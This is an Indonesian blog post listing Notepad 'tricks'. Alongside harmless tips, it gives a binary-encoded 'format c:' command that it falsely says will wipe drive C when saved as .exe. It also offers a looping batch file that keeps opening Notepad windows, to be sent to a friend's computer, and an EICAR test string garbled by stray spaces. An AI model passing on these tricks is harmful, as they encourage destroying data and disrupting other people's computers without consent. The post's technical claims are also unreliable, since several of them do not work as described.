Tips dan Trik Keren Netepad Komputer


Tips dan Trik Keren Netepad Komputer –Netpad merupakan suatu aplikasi teks editor bawaan dari windows. Netepad banyak digunakan untuk membuat dan menyimpan catatan penting yang disimpan dalam bentuk txt. Kali ini saya akan mencoba memberikan beberapa Tips dan Trik Keren Netepad Komputer, hal ini untuk membuat pada pengguna Notepad lebih menarik. 

Tips dan Trik Keren Netepad Komputer


1. Membuat Diary Sederhana Menggunakan Notepad


Mungkin banyak diatara anda yang tidak mengetahui bahwa notepad dapat digunakan sebagai diary digital sederhana. Berikut adalah langkah – langkah yang harus anda ikuti untuk membuat suatu buku harian pada notepad bawaan windows.

Pertama buka notepad kalian
Ketikan .LOG (dalam huruf besar) dan kemudian tekan Enter.
Simpan Notepad dengna ekstensi .txt

Uniknya apa bila anda membuka file diary yang anda buat tadi maka anda akan melihat tanggal dan waktu yang telah ditambahkan secara otomatis. Hal ini akan terjadi saat setiap kali anda membuka file diary anda. Jadi anda cukup menulis diary saja tanpa harus membuat tanggal dan waktunya. Keren bukan.

2. Menguji Antivirus Anda



Apa bila anda ingin mengetahui efektivitas dari antivirus yang anda gunakan dikomputer anda, anda bisa mengikuti langkah – langkah berikut ini demi untuk mengetahui seberapa efektip antivirus yang anda gunakan.

Pertama buka notepad > lalu copy kode dibawah ini, kemudian pastekan dlaam file notepad : 

X5O! P% @ AP [4 \ PZX54 (P ^) 7CC) 7} $ EICAR-STANDARD-ANTIVIRUS-TEST-FILE! $ H + H *

Kemudian simpan dengna  ekstensi .exe, sebagai contoh : tesantivirus.exe

Kemudian simpan file tersebut, setelah anda simpan, maka program anti virus dikomputer anda akan langsung mendeteksi file tersebut sebagai virus dan antivirus anda akan memberikan intruksi  atau tindakan untuk menghapusnya.

3. Membuat Efek Matriks


Apa bila anda ingin membuat efek Matrix yang terinspirasi dari film “matrix”? hal tersebut bisa dibuat sangat sederhana.

Buka notepad > kemudian salain teks dibawah ii ke dalam notepad anda.

@echo off 
color 02 
:start 
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% 
goto start .

Simpan file dengan ekstensi .bat. sebagai contoh : matrix.bat. > lalu anda buka file matrix.bat yang anda simpan tadi, kemudian lihat hasilnya.

4. Format Drive C Dengan Virus



Buka notepad anda > copy dan pastekan kode dibawah ini ke notepad anda.

011001100110111101110010011011010110000101110100001000000110001100111010010111000010000000101111010100010010111101011000.

Kemudian simpan dengan dengan ekstensi exe dengan mana apapun yang anda sukai > lalu klik dua kali kepada file tersebut untuk membukanya dan anda akan melihat drive C: anda telah diformat. Saran saya Gunakan Notepad Trutama trik ini dengan hati – hati dan bijak.

5. Membuka Notepad Di Komputer Teman Anda


Buka notepad > copy dan pastekan kode dibawah ini ke notepad anda.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top .

Kemudian simpan sebagai “Anyname.BAT” kemudian kirimkan kekomputer teman anda.

Demikian lah Tips dan Trik Keren Netepad Komputer, semoga artikel ini bisa bermanfaat bagi teman – teman sekalian, dan jangan lupa pula berikan saran dan komentar anda dikolom komentar dibawah ini. Trimahkasih.




SHARE

Penulis

Saya telah menyediakan layanan kolom komentar dibawah ini. Silakan anda berkomentar dengan baik dan sopan, dan gunakanlah kata – kata yang mudah dipahami. Saya mohon maaf jika balas komentarnya agak lama karena saya tidak online 24 jam.

    Blogger Comment
    Facebook Comment

0 komentar:

Posting Komentar